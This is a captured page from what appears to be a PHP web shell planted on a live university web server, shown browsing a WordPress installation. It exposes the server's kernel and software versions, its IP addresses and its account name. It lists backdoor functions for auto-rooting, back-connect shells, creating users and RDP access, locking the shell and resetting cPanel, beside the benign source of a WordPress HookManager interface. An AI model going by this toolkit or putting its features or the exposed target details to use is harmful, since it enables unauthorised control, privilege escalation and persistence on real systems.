Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.147.103.106
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
www /
html /
cesa2025 /
wp-includes /
Requests /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Auth
[ DIR ]
drwxr-xr-x
Cookie
[ DIR ]
drwxr-xr-x
Exception
[ DIR ]
drwxr-xr-x
Proxy
[ DIR ]
drwxr-xr-x
Response
[ DIR ]
drwxr-xr-x
Transport
[ DIR ]
drwxr-xr-x
Utility
[ DIR ]
drwxr-xr-x
Auth.php
860
B
-rw-r--r--
Autoload.php
9.12
KB
-rw-r--r--
Capability.php
652
B
-rw-r--r--
Cookie.php
15.03
KB
-rw-r--r--
Exception.php
1.09
KB
-rw-r--r--
HookManager.php
709
B
-rw-r--r--
Hooks.php
2.96
KB
-rw-r--r--
IdnaEncoder.php
12.14
KB
-rw-r--r--
Ipv6.php
5.51
KB
-rw-r--r--
Iri.php
28.93
KB
-rw-r--r--
Port.php
1.47
KB
-rw-r--r--
Proxy.php
867
B
-rw-r--r--
Requests.php
33.2
KB
-rw-r--r--
Response.php
4.18
KB
-rw-r--r--
Session.php
8.89
KB
-rw-r--r--
Ssl.php
5.3
KB
-rw-r--r--
Transport.php
1.51
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : HookManager.php
<?php /** * Event dispatcher * * @package Requests\EventDispatcher */ namespace WpOrg\Requests; /** * Event dispatcher * * @package Requests\EventDispatcher */ interface HookManager { /** * Register a callback for a hook * * @param string $hook Hook name * @param callable $callback Function/method to call on event * @param int $priority Priority number. <0 is executed earlier, >0 is executed later */ public function register($hook, $callback, $priority = 0); /** * Dispatch a message * * @param string $hook Hook name * @param array $parameters Parameters to pass to callbacks * @return boolean Successfulness */ public function dispatch($hook, $parameters = []); }
Close